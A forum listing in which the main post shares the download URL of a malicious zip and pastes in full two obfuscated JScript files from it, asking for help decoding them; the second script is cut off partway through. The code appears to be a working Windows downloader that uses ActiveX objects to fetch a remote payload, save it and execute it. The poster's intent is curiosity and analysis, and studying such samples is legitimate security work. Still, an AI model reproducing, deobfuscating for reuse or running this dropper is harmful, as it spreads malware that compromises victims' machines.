Últimos Temas de: Flamer

Mostrar Temas
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17

31	Programación / .NET (C#, VB.NET, ASP) / Crear ejecutable nativo no .net en vb.net	en: 7 Diciembre 2018, 19:55 pm
Hola desde que conocí vb.net huvo una gran decepción ya que los ejecutables que se creaban eran decompilados con un decompilador de net y no con ollydbg y mi pregunta es que si se pueden crear ejecutables nativos en vb.net y que no puedan ser decompilados con decompiladores para net saludos Flamer

32	Seguridad Informática / Análisis y Diseño de Malware / alternativa a virustotal	en: 15 Noviembre 2018, 22:12 pm
hola compañeros como algunos ya saben virus total comparte las muestras con los antivirus y pues quería preguntarles si saben de alguna pagina que sea similar a virus total saludos

33	Seguridad Informática / Análisis y Diseño de Malware / Archivos de Hendrix	en: 11 Noviembre 2018, 18:18 pm
hola les comparto algunos archivos de hendrix que encontré en la web, en su mayoría todos son del 2006 aquí el link http://www.geocities.ws/cusacoxa/ rescaten lo que puedan ya que no se cuanto dure esa pagina saludos Flamer y si encuentran otro crackme aparte del Axiateam.zip me avisan

Seguridad Informática / Análisis y Diseño de Malware / descifrar codigo de un virus js

en: 22 Julio 2018, 06:01 am

hola amigos navegando por internet por un a cortador se me descargo un archivo zip de este sitio

ATENCION EL SIGUIENTE LINK CONTIENE UN ARCHIVO CON VIRUS

Código:

hxxp://167.99.55.222/xsx5/installer.zip

y la curiosidad me hizo abrirlo y adentro contenía 2 archivos js y pues al no entender el código lo publico aquí a ver quien me ayuda a descifrarlo

Código

 
function lhf(n) {
    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
}
 
function jfsx(n) {
    return umubg.zqdwb + zoq[15] + crqs.czo
}
 
function sgrl(n) {
    return sicl[0] + zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lla.hre + uflh.fje + ohzn[10] + ohzn[11]
}
 
function rdm(n) {
    return sicl[0]
}
 
function fdbg(n) {
    return wxsf.xeqo + dhl[0] + chhjy[13] + dhl[0] + crqs.iff + lcx[4] + sicl[0] + qbnx[1] + mgnyo.xah + ohzn[11] + uflh.fje + ohzn[10]
}
 
function szxyw(n) {
    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + qso[3] + yggsv[3] + dhl[11] + ohzn[11] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + uflh.xpcj + yggsv[3] + dhl[11] + lcx[4] + mgnyo.xah + yggsv[16] + umubg.hzxa + wxsf.zwav + chhjy[6] + wxsf.zwav + uflh.mzrn + umubg.hzxa + wxsf.xeqo + sicl[0] + uflh.oqn + zva[6] + yggsv[14] + uflh.fje + qbnx[1] + ohzn[11] + mgnyo.xah + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
}
 
function vfjqh(n) {
    return cew[5]
}
 
function wbkj(n) {
    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + iqyl[10] + uflh.xpcj + jhv.zzg + lla.ydspg + chhjy[6] + zva[10] + yggsv[3] + ohzn[10] + crqs.rdjk + uflh.oqn + qbnx[1] + dhl[11] + yggsv[15] + cew[16] + jhv.zzg + dhl[11] + cew[16] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + ohzn[10] + umubg.hzxa
}
 
function vror(n) {
    return cew[5]
}
 
function exmcp(n) {
    return sicl[0]
}
 
function xuqj(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lcx[4] + sicl[0] + iqyl[10] + ohzn[11] + dhl[11] + dhl[11]
}
 
function xeve(n) {
    return chhjy[13] + zva[6] + ohzn[11] + uflh.xpcj
}
 
function dlw(n) {
    return zva[0]
}
 
function nzban(n) {
    return cew[5] + mgnyo.xah + yggsv[3] + qbnx[1] + ohzn[11]
}
 
function ouklt(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}
 
function txm(n) {
    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
}
 
function ntxa(n) {
    return yggsv[12]
}
 
function gmmc(n) {
    return mgnyo.xah + uflh.oqn + uflh.xpcj
}
 
function zjzno(n) {
    return cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + lcx[4] + cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + cew[2] + ohzn[11] + ickh[8] + uflh.oqn + ohzn[11] + chhjy[6] + qbnx[1] + lcx[4] + uflh.mzrn + lcx[4] + chhjy[1]
}
 
function hmnf(n) {
    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
}
 
function yci(n) {
    return cew[2] + ohzn[11] + chhjy[6] + zva[6] + yggsv[16] + uflh.xpcj + chhjy[6] + ohzn[11] + crqs.iff + yggsv[16] + yggsv[14] + yggsv[15]
}
 
function sibmy(n) {
    return yggsv[14] + ohzn[11] + zva[6] + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
}
 
function omlpg(n) {
    return ohzn[11]
}
 
function krdq(n) {
    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
}
 
function jqoe(n) {
    return umubg.zqdwb + zoq[15] + crqs.czo
}
 
function mcgy(n) {
    return cew[10] + yggsv[16] + chhjy[6] + yggsv[3] + qbnx[1] + yggsv[3] + yggsv[16] + uflh.xpcj
}
 
function emal(n) {
    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
}
 
function fwagy(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}
 
function lokh(n) {
    return qso[5] + dhl[11] + yggsv[16] + chhjy[6] + ohzn[11]
}
 
function yclp(n) {
    return uflh.xpcj + ickh[1]
}
 
function pvz(n) {
    return chhjy[6] + uflh.oqn + zva[10] + chhjy[6] + qbnx[1] + mgnyo.xah + yggsv[3] + uflh.xpcj + jhv.zzg
}
 
function wvt(n) {
    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
}
 
function gdnu(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1]
}
 
function jgl(n) {
    return crqs.czo + yggsv[15] + zva[6] + ohzn[11]
}
 
function urtaq(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}
 
function bsj(n) {
    return chhjy[6] + ohzn[11] + qbnx[1] + crqs.czo + yggsv[3] + ohzn[10] + ohzn[11] + yggsv[16] + uflh.oqn + qbnx[1] + chhjy[6]
}
 
function fcpyg(n) {
    return zoq[19]
}
 
function rwq(n) {
    return ohzn[10] + yggsv[14] + zva[0] + umubg.hzxa
}
 
function misb(n) {
    return sicl[0] + uflh.fje + uflh.aslpo + ohzn[11] + crqs.czo + yggsv[16] + chhjy[12] + yggsv[3] + dhl[11] + ohzn[11]
}
 
function jqtrw(n) {
    return uflh.fje + dhl[11]
}
 
function mvas(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + yggsv[3] + uflh.xpcj + jhv.zzg + lcx[4] + chhjy[12] + yggsv[3] + dhl[11]
}
 
function trg(n) {
    return jhv.zzg + ickh[1] + chhjy[6] + ohzn[10] + cew[16] + uflh.aslpo + ohzn[10] + uflh.oqn + uflh.fje + zva[10] + ickh[1] + chhjy[6] + lla.ydspg + yggsv[15] + uflh.oqn + yggsv[14] + qbnx[1]
}
 
function fyzr(n) {
    return qbnx[3] + sicl[0] + yggsv[6] + qbnx[3] + ryqzj[3] + mgnyo.tvzg + lcx[4] + yggsv[6] + qbnx[3] + ryqzj[3] + crqs.rfcdv + crqs.czo + crqs.czo + cew[10]
}
 
function glvr(n) {
    return zoq[19]
}
 
function qbvjh(n) {
    return sicl[0] + yggsv[15] + chhjy[6] + qbnx[1] + ohzn[11] + ohzn[10] + chhjy[13] + zva[10] + lla.ydspg + ohzn[11] + zoq[19] + qbnx[1]
}
 
function znbrt(n) {
    return umubg.zqdwb + ohzn[11] + qbnx[1] + sicl[0] + zva[6] + ohzn[11] + zoq[19] + yggsv[3] + uflh.fje + dhl[11] + chhjy[12] + yggsv[16] + dhl[11] + yggsv[14] + ohzn[11] + mgnyo.xah
}
 
function ssje(n) {
    for (var h = [7619, 283, n, yclp("vnWU^wj0P_mO+y0")], c = (jqtrw("z!79v$czq^A.ET"), 0); c < 2393; c++)
        for (var u = 0; u < 7169; u++) {
            if (1828 == c) return h[c - 1828 + 2]
        }
    return h[1]
}
 
function wrim() {
    return new ActiveXObject(fyzr("KwgS^vDm(8A"))
}
 
function ygqth() {
    return new Date
}
var qso = ["Oyr", "Ldhfp", "Ksq", "f", "Ypqiz", "C"],
    iqyl = [599, "Gangi", 887, "T", "e", 634, "Xqydy", 849, "Hlxp", 587, "h"],
    umubg = {
        zqdwb: "G",
        epycx: "Jgb",
        iid: "Gmhxk",
        pipzu: "Hvbv",
        pbcc: 146,
        uxbfa: "Abdk",
        xlm: 748,
        iyv: 827,
        lzkpe: "o",
        qhsk: 362,
        hzxa: "/",
        sfh: ","
    },
    cew = ["Vakm", 682, "R", "Nvuv", "Ket", "W", "e", 423, 684, 19, "P", "7", "$", "z", "a", "Juif", "w", "Dlge", "Juxva", 191],
    zva = [" ", 879, 969, 951, 692, ",", "p", "7169", 297, "30000", "b", "V", "7619"],
    ohzn = [426, "1", "c", "8", "g", 150, 62, "*", 300, "Jhdbq", "m", "e"],
    zoq = ["Gzqba", 680, 743, "Zbc", "Fmwik", "Gjsm", 604, "3", "Ihewl", "0", "P", "2393", "Imiw", "p", "Khf", "E", "Otiv", "Hset", 312, "c"],
    yggsv = [341, "*", 834, "i", "Szl", "h", "X", "eval", "p", "Szhsm", "m", "Tqz", "\\", "Anqnz", "d", "y", "o"],
    ryqzj = [828, "B", "Rprq", "L", "Xstbu", "Z", "Kyg"],
    rglf = {
        swaue: "2",
        unj: 8,
        sri: 213,
        qdr: "Q",
        tbjs: "Bgtf",
        fxvvu: "Fnzm",
        vloc: 361,
        wsyk: 132,
        dfys: "60000",
        ego: "h",
        jhi: 448,
        adnu: "Xuser",
        eck: "Dly",
        nnt: 589,
        jrshr: 926,
        bqj: 322,
        vivr: "Vjc",
        gbz: "Ydq",
        xcxp: "Powwx",
        mpz: "Pkmy"
    },
    jhv = {
        efvno: "Bds",
        elma: "Ntk",
        zzg: "g",
        pzg: 595,
        didg: 860,
        wbjl: ","
    },
    uflh = {
        tfanu: "Baqt",
        oqn: "u",
        ukpl: "9",
        gxn: 904,
        lqmr: "200",
        xpcj: "n",
        aslpo: "v",
        kzqpj: "1828",
        mzrn: "5",
        czd: "Suux",
        hxpgq: "1",
        fje: "a"
    },
    lcx = [554, "Ujtnj", "i", 173, ".", 512],
    pcd = ["Dvx", 26, "Yvr", "b", "n", "0"],
    dhl = ["D", 628, 680, "d", 536, "&", "K", "Cxgf", "Qwlul", 432, "6", "l", "Ijtwg", ";", 513, "Hlbmu", "K"],
    qqzsc = {
        esp: "K",
        lprg: 590,
        hfvw: 762,
        yas: 311,
        rfle: "Xprxo",
        wmlkb: "340"
    },
    qbnx = ["ActiveXObject", "t", 473, "M", "E"],
    wxsf = {
        ojbw: "d",
        gblt: "(",
        mnds: 889,
        zwav: "x",
        jzsnh: "K",
        dly: 737,
        sjvcn: "q",
        xeqo: "A",
        toayq: "Zath",
        pll: 960,
        hhj: "6",
        kac: "Nncvp",
        uosf: "Bfzgz",
        klk: "283",
        scdit: 493,
        fbam: "6",
        ksl: "G",
        dcmrh: "8"
    },
    mgnyo = {
        tvzg: "2",
        xxvy: "E",
        hjxn: "O",
        bsz: 76,
        xah: "r",
        anyl: "^",
        banrv: "S",
        uvgo: 427,
        enqg: "Yre",
        qiyc: "!",
        tfgtq: "Aeur",
        xmiq: 658,
        gxt: "H",
        zxayj: 844,
        mhlh: 764
    },
    crqs = {
        jur: "M",
        iff: "B",
        fyeu: "Qtj",
        zynw: "E",
        negjj: "Erk",
        rfcdv: "H",
        nhd: "u",
        uea: "4",
        rdjk: "k",
        czo: "T",
        rwx: 293,
        ewr: 155,
        ovm: 630,
        dwf: "Jjo",
        ols: "Dtntj",
        qym: "27"
    },
    chhjy = ["Sgsp", "1", "Sgkdb", "5", 505, "J", "s", "Mncp", "Kxcw", "X", ":", 902, "F", "O"],
    lla = {
        ydspg: "j",
        hre: "N",
        omug: "i",
        vgxje: "c",
        kjnt: "-",
        ngs: "Tpjzh",
        fxdp: "("
    },
    sicl = ["S", ")", "Ekt", 517, "Jye", 566, "Nakdd", "2", 966, "Ynn", "1200000", "O", 577, "J", 198, 579, 516, "Uqmqx", "Pnvx"],
    ickh = [645, "z", "C", ":", 579, 564, "Gtca", "Klss", "q", 831, "Gkasc", "Fzk"],
    adq = ["Yagz", "Nkkx", "Wadgu", 267, "7", "9", "v", "k", "Date", 148],
    qwitd = [-27],
    ozl = [340],
    jldvt = [],
    rxiql = [7],
    upkrl = [];
upkrl[0] = szxyw("kwRItA_g8I");
for (var svoyw = [0], bien = [sibmy("T+A!pYFY.z@7M")], naft = !1, xib = ssje(rdm("k^J&c1H_pV")), hkext = eval(vfjqh("RX6.@bbUu.Ki.") + xib + gdnu("&I%PCHgWiQTMfew")), ppkqs = ActiveXObject, oax = ssje(exmcp("to)i.5W;Pr0")), hhy = 0; hhy < upkrl[krdq("ts6JnjK8jS")]; hhy++) {
    var ohdy = ssje(omlpg("6zPp$2GgXu@Rm.")),
        laqo = new ppkqs(oax + mvas("&.^9x8b6hYZN4HF") + ohdy + qbvjh("S;E6vARY5G3"));
    try {
        var sfu = laqo[znbrt("PU2u.NkI3q6Q")](2),
            rokqj = new ppkqs(zjzno("6pD!EIEso8Xi")),
            ucua = 3e4,
            tzjoc = 6e4,
            azvtb = 3e4,
            otleu = 12e5;
        rokqj[bsj("3_GYaOTwN(2pZ")](ucua, tzjoc, azvtb, otleu);
        try {
            for (; trg("DK^9o59@UfKJ6^q");) {
                var dnez = wrim();
                if (dnez[hmnf("fokP*&RS&Iu")](jfsx("R:SGW1az*ztwJm"), wbkj("(ORL4t3xtqDH"), !1), dnez[lhf("FVINJHNP&@dog^")](), 200 != dnez[ouklt("ha!73w$CvnBTy1")]) break
            }
        } catch (n) {}
        if (5 == svoyw[hhy]) {
            var wpc = hkext[sgrl("^AJ+6Qm@ya(j")],
                gifmj = wpc[pvz("C@@X_34t5@-k")](0, wpc[emal("70guj2N,-iWmb")] - 3);
            upkrl[hhy] += gifmj
        }
        sfu += ntxa("_CYoX6EyEi(Gj$"), sfu += bien[hhy];
        var yzt = 5;
        do {
            rokqj[wvt("3BMbECdG6+n")](jqoe("jC5(99%w%6IFJ!"), upkrl[hhy], 0), rokqj[txm("bX.Km)JmP)O")](), yzt--
        } while (200 != rokqj[urtaq("q_R*XFt!g;")] && yzt);
        if (200 == rokqj[fwagy("$z-coFC0TCr")]) {
            var sca = new ppkqs(vror("(GBq5mlqKu_kIDy") + xib + xuqj("eS9Y6HyV0v"));
            if (8 == svoyw[hhy] && (svoyw[hhy] = 0), svoyw[hhy] <= 3) {
                var eqyh = new ppkqs(fdbg("7a,Bd6K.6ND^FWl"));
                eqyh[xeve("_Y$BkGDYp)-6")](), eqyh[jgl("MNbcc$)3fUmN")] = 1, eqyh[mcgy("(0KcZ!4;%XBE5YH")] = 0, eqyh[nzban("DmG1XPy:WXnU")](rokqj[yci("DBgWzCK)zInp.s")]), eqyh[misb("I2I_bBDotbmg")](sfu), eqyh[lokh("d5uyi,h9N+.,jO")](), svoyw[hhy] || sca[gmmc("qnh!lMgrN8OCJu")](ssje(glvr("CpVAuS,Myq-LW&H")) + rwq("_$Q-ElY8GjqyhH") + ssje(fcpyg("JwmqfJuvl+X")) + dlw("(Kn*GxoxnokyP^") + sfu, 0, 0)
            }
        }
    } catch (n) {}
}

y este es el otro

Código

function wmnhg(n) {
    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + niu.mxq + zhi[0] + rov[1] + lko.fbmgm + qit[5] + qit[8] + niu.mywhk + yqo[1] + vvbs.jnws + zhi[0] + rov[1] + qit[8] + niu.fsvd + yqo[1] + tzyr.nayhc + rov[7] + qit[5] + rov[7] + pqjb[7] + tzyr.nayhc + niu.uneo + niu.fih + lko.cpwe + vvbs.rmuqx + put.hykw + tzyr.spfjs + put.poihe + lko.fbmgm + niu.fsvd + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
}
 
function plh(n) {
    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + pqjb[8] + lko.fbmgm + pqjb[4] + lko.fbmgm + rov[7] + sbfwq.yljev + vvbs.rmuqx + bcx[5] + tzyr.spfjs + rov[7] + sbfwq.yljev + opymo.rsdnz + qit[8] + niu.mywhk + yqo[1] + pqjb[4] + tzyr.nayhc
}
 
function ssdie(n) {
    return rov[16] + niu.fsvd + zhi[0] + put.poihe + lko.fbmgm
}
 
function mkwm(n) {
    return niu.fih + tzyr.spfjs + divuu.eplv + lko.fbmgm + qit[1] + yqo[1] + put.qcx + zhi[0] + rov[1] + lko.fbmgm
}
 
function vupzg(n) {
    return rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + qit[8] + rov[16] + zhi[0] + vvbs.jnws + put.begwe + put.poihe + put.poihe + vvbs.rmuqx + glb.nthy + lko.fbmgm + yqo[5] + lko.cpwe + lko.fbmgm + qit[5] + put.poihe + qit[8] + pqjb[7] + qit[8] + kfa[6]
}
 
function cwk(n) {
    return pqjb[13] + opymo.jjuae + qit[1]
}
 
function lqlrb(n) {
    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}
 
function padva(n) {
    return lko.fbmgm
}
 
function vme(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe
}
 
function nlc(n) {
    return glb.nthy + lko.fbmgm + qit[5] + vvbs.rmuqx + yqo[1] + vvbs.jnws + qit[5] + lko.fbmgm + opymo.gedag + yqo[1] + put.hykw + opymo.rsdnz
}
 
function wnpk(n) {
    return niu.mywhk
}
 
function fqlvs(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + zhi[0] + vvbs.jnws + pnh[10] + qit[8] + put.qcx + zhi[0] + rov[1]
}
 
function qyno(n) {
    return pqjb[4] + put.hykw + kfo.amuzg + tzyr.nayhc
}
 
function sehl(n) {
    return rov[12] + yqo[1] + qit[5] + zhi[0] + put.poihe + zhi[0] + yqo[1] + vvbs.jnws
}
 
function yjf(n) {
    return niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + qit[8] + niu.fih + bcx[5] + lko.fbmgm + rov[1] + rov[1]
}
 
function vssa(n) {
    return vvbs.jnws + pqjb[8]
}
 
function twy(n) {
    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
}
 
function frt(n) {
    return put.tsf
}
 
function ycxqu(n) {
    return tzyr.spfjs + rov[1]
}
 
function pcf(n) {
    return gba.mgjj + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}
 
function sekmh(n) {
    return rov[16]
}
 
function vgjl(n) {
    return pqjb[13] + opymo.jjuae + qit[1]
}
 
function thpfk(n) {
    return niu.fih + opymo.rsdnz + qit[5] + put.poihe + lko.fbmgm + pqjb[4] + gba.mgjj + sbfwq.yljev + niu.lvg + lko.fbmgm + niu.mywhk + put.poihe
}
 
function mrfu(n) {
    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
}
 
function axvhz(n) {
    return niu.fsvd + lko.cpwe + vvbs.jnws
}
 
function thk(n) {
    return rov[1] + lko.fbmgm + vvbs.jnws + pnh[10] + put.poihe + bcx[5]
}
 
function wzuge(n) {
    return niu.mywhk
}
 
function yzzhd(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}
 
function nla(n) {
    return niu.fih + niu.mywhk + niu.fsvd + zhi[0] + vvbs.rmuqx + put.poihe + divuu.mse + tzyr.spfjs + pqjb[4] + lko.fbmgm
}
 
function pgig(n) {
    return niu.fih
}
 
function yorid(n) {
    return qit[5] + lko.fbmgm + vvbs.jnws + put.hykw
}
 
function mizvs(n) {
    return opymo.rsdnz + yqo[1] + rov[1] + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
}
 
function zgmt(n) {
    return kfo.amuzg
}
 
function fpu(n) {
    return rov[7] + tzyr.spfjs + pqjb[3] + pqjb[3] + put.poihe + put.hykw + niu.lvg + bcx[5] + zhi[0] + lko.fbmgm + vvbs.jnws + lko.cpwe + sbfwq.yljev + zhi[0] + bcx[10] + rov[7] + niu.lvg + bcx[5] + pqjb[8]
}
 
function ksp(n) {
    return yqo[1] + vvbs.rmuqx + lko.fbmgm + vvbs.jnws
}
 
function yhinm(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}
 
function aic(n) {
    return niu.fih
}
 
function yhiwo(n) {
    return rov[16]
}
 
function ilgq(n) {
    return qit[5] + lko.fbmgm + put.poihe + qit[1] + zhi[0] + pqjb[4] + lko.fbmgm + yqo[1] + lko.cpwe + put.poihe + qit[5]
}
 
function rvl(n) {
    return rwnw.slevm + rov[1] + yqo[1] + qit[5] + lko.fbmgm
}
 
function ujgwe(n) {
    return niu.fih + put.poihe + tzyr.spfjs + put.poihe + lko.cpwe + qit[5]
}
 
function rjg(n) {
    return psp[2] + niu.fih + kfo.tlxoz + psp[2] + pqjb[14] + pucy[3] + qit[8] + kfo.tlxoz + psp[2] + pqjb[14] + put.begwe + qit[1] + qit[1] + rov[12]
}
 
function nof(n) {
    return qit[5] + lko.cpwe + sbfwq.yljev + qit[5] + put.poihe + niu.fsvd + zhi[0] + vvbs.jnws + pnh[10]
}
 
function mipjn(n) {
    return qit[1] + opymo.rsdnz + vvbs.rmuqx + lko.fbmgm
}
 
function eda(n) {
    return pqjb[13] + lko.fbmgm + put.poihe + niu.fih + vvbs.rmuqx + lko.fbmgm + niu.mywhk + zhi[0] + tzyr.spfjs + rov[1] + put.qcx + yqo[1] + rov[1] + put.hykw + lko.fbmgm + niu.fsvd
}
 
function zxoum(n) {
    return niu.uneo + psp[1] + gba.mgjj + psp[1] + opymo.gedag + qit[8] + niu.fih + put.poihe + niu.fsvd + lko.fbmgm + tzyr.spfjs + pqjb[4]
}
 
function bsqoi(n) {
    for (var o = [7619, 283, n, vssa(",n1r%SSV_-yZ^")], u = (ycxqu("O1.Ew7OI(-IsmI"), 0); u < 2393; u++)
        for (var t = 0; t < 7169; t++) {
            if (1828 == u) return o[u - 1828 + 2]
        }
    return o[1]
}
 
function azqp() {
    return new ActiveXObject(rjg("7,$ppXb3Hj"))
}
 
function nvy() {
    return new Date
}
var pqjb = [241, "Dufzd", 286, "k", "m", "Hnf", 640, "5", "z", 658, 471, "Citte", "c", "G", "L"],
    glb = {
        iuxag: "V",
        nthy: "R",
        fqz: "Jlavq",
        cmzc: "4",
        qvyiw: "F",
        leflp: 393,
        pwalc: 160,
        jxbr: "i",
        lgt: "Pxzt",
        vqne: "O",
        vniif: 892,
        cmg: "Zfrw",
        fffr: "v",
        rrxr: 826,
        dnfj: "("
    },
    psp = ["0", "D", "M", "Ztzh", "Vmh", 293, "W", 311, "6"],
    lko = {
        nnff: "L",
        cpwe: "u",
        euf: "Yuu",
        tux: 936,
        fbmgm: "e",
        ecjw: "Z",
        qvvff: "1828"
    },
    vvbs = {
        phg: 520,
        rmuqx: "p",
        yubsx: "Ruiak",
        bnzv: 890,
        niy: "7169",
        jnws: "n",
        ywqc: 919,
        orx: 469,
        ejk: 948,
        thnn: 562,
        oceqj: "Not",
        kjhlw: "Cfd",
        hpfbk: "Cqa"
    },
    opymo = {
        docm: ":",
        uro: "60000",
        idqx: "Hsy",
        gacqa: "1",
        jjuae: "E",
        udrn: 919,
        bqjtz: "Date",
        zpb: 146,
        rsdnz: "y",
        gedag: "B",
        bde: 151,
        zfy: "eval"
    },
    yqo = ["K", "o", "Parxh", 115, 597, "q", "p", 900, "Zvlbb", "c"],
    pucy = ["2", 911, "2393", "2", "Ijrl", "8", 572],
    kfa = ["J", "Tpgqs", "Yfz", "3", "Dadem", "Exra", "1", "Qvzc", 800, "Yjylt", 433, 585, "Rhbfr", "m", "Coxuw", "r", "r"],
    sbfwq = {
        kru: 726,
        jhmia: "Bebrr",
        zzp: "Sjq",
        lvyv: "T",
        tldql: 907,
        yljev: "b",
        ymo: "Azzx"
    },
    qit = ["Gon", "T", "e", "E", "Hka", "s", "Asc", "E", ".", 80, 727, 248, "2", "e", "r", "4"],
    rov = ["Lgge", "l", 54, "Tskh", "$", 91, "Eghv", "x", "7", 705, "200", "Ozby", "P", "Eixr", ";", "Okhay", "W"],
    isksi = {
        benn: 478,
        sdo: "F",
        pkadk: "3",
        pkrlp: "H",
        aaw: 713,
        upu: "Uov",
        btx: "Vzl"
    },
    tzyr = {
        nayhc: "/",
        nja: "-",
        rhn: 182,
        acgb: 804,
        tdfil: "o",
        azis: "Jutn",
        spfjs: "a",
        nxqlb: "Maj",
        imsao: 995
    },
    pnh = [103, "Mkbt", "w", "5", "A", "Udxc", "Mkhlf", 193, "%", "Nfjw", "g", 161, "J", "i", 316, 593],
    gba = {
        ariae: "Nnk",
        qwxv: "2",
        mzd: 347,
        lrj: "D",
        xba: 817,
        njrs: "Gwjcf",
        cvu: "1200000",
        izgfd: "S",
        zrjc: "Gdqid",
        iatqy: "g",
        yrxhc: "May",
        mgjj: "O",
        tlvvq: "E"
    },
    bcx = ["O", "Ctqo", "Mnj", 998, "289", "h", 883, "Taqis", "Fysx", "Eclw", "w", 844, "Litn", 559],
    divuu = {
        mse: "N",
        mwdpo: 718,
        eso: "F",
        eplv: "v",
        ftcn: "Ont",
        iftxt: "b",
        mgwqa: 491,
        fnhs: 928,
        oob: "Y",
        fdjm: 225,
        rdpeg: "Wlbe",
        qhmy: 945,
        pnv: "30000",
        mxnu: "Bhnem",
        qct: "M",
        puokp: "283"
    },
    zhi = ["i", "n", "Jkh", 993, 415, "597"],
    niu = {
        sjmkx: "%",
        fsvd: "r",
        mxq: "f",
        suy: "F",
        wxjh: "l",
        lvg: "j",
        tgy: "Jxqf",
        fih: "S",
        mywhk: "c",
        uneo: "A",
        tyscc: 331,
        chz: 885,
        cviwo: "Bavuc",
        grk: "!",
        otvcq: "Sdyw",
        bkypx: "Jmn",
        rap: 558,
        kpfgu: 965
    },
    rwnw = {
        soqvz: 690,
        jpjv: "Ipgkx",
        nqnk: "Xguxt",
        jurt: 966,
        tzdmn: 187,
        wozz: "Jxmg",
        qxlpk: "Twrj",
        kfc: "J",
        slevm: "C",
        nfgwb: 918,
        ohz: "Hwqrt",
        xnrh: "Ajx",
        mgi: "J",
        punj: 364,
        uey: "2",
        jrkzz: 664
    },
    put = {
        ibb: 68,
        poihe: "t",
        tsf: "\\",
        begwe: "H",
        sxwc: 115,
        tzxjt: "s",
        xqor: "*",
        bbf: "ActiveXObject",
        qcx: "F",
        dzy: "V",
        pjb: "7619",
        pmged: "*",
        wvduv: "K",
        ifbd: "Iqxpc",
        hykw: "d",
        pgt: "F",
        cvi: 848
    },
    kfo = {
        krrxd: "(",
        tbcl: 507,
        tlxoz: "X",
        amo: "Tos",
        amuzg: " ",
        zns: "A",
        zvqln: 14,
        cocmt: "Yrcje",
        kstve: 278
    },
    lcza = [-597],
    ymdeu = [289],
    hkjyt = [],
    bigjj = [7],
    ahunl = [];
ahunl[0] = wmnhg("deoLbw$Aca_");
for (var nngl = [0], ael = [mizvs("ZbvNEXgH))f")], hdqk = !1, ephrk = bsqoi(pgig(")g.6j1Xt^rKI5")), xeu = eval(sekmh("2oO25X_m7:+z") + ephrk + vme("n*&xINca.4m,0")), faefr = ActiveXObject, dykkd = bsqoi(aic("&96t3k-uvdL.DE")), lye = 0; lye < ahunl[thk("W%JCQ3myM01ki4Z")]; lye++) {
    var gzsn = bsqoi(padva("uHY$X1ghzz^gIp*")),
        hre = new faefr(dykkd + fqlvs("R2GC6!mM(:,^7") + gzsn + thpfk("cc5cN6kL%n%Af"));
    try {
        var xvxb = hre[eda("+L01EvS-k2gNj")](2),
            nco = new faefr(vupzg("Gb&;CYxSb-")),
            cbic = 3e4,
            dslh = 6e4,
            phyg = 3e4,
            ncz = 12e5;
        nco[ilgq("2.ddPpkd%%")](cbic, dslh, phyg, ncz);
        try {
            for (; fpu("Pv^D4gcfmo8");) {
                var voyg = azqp();
                if (voyg[lqlrb("0,IH_$wKM51b)E")](cwk(".-Q(jqSKfQ$)Z"), plh("8D2w0E*D*bG"), !1), voyg[yorid("9^($osbnH1f*aLL")](), 200 != voyg[yhinm("QS9EhlGR2:u4e")]) break
            }
        } catch (n) {}
        if (5 == nngl[lye]) {
            var umjf = xeu[nla("ZbsKQkX582TO")],
                row = umjf[nof("VHNyeMELz%Sm^Nn")](0, umjf[mrfu("sz+7M6Su,!@QH.l")] - 3);
            ahunl[lye] += row
        }
        xvxb += frt("9@O_6.t^e_Ux80"), xvxb += ael[lye];
        var mlh = 5;
        do {
            nco[ksp("U6uOcmHDTV")](vgjl("v2iV$^O:geUD@"), ahunl[lye], 0), nco[twy("ME(bHjfii,C!yv")](), mlh--
        } while (200 != nco[ujgwe("S1E7.*Hnj8TZ")] && mlh);
        if (200 == nco[yzzhd("P(SlasP2Ik7")]) {
            var ozefl = new faefr(yhiwo("Uo$Mu;z!!:2D") + ephrk + yjf("xe5LT.($QI"));
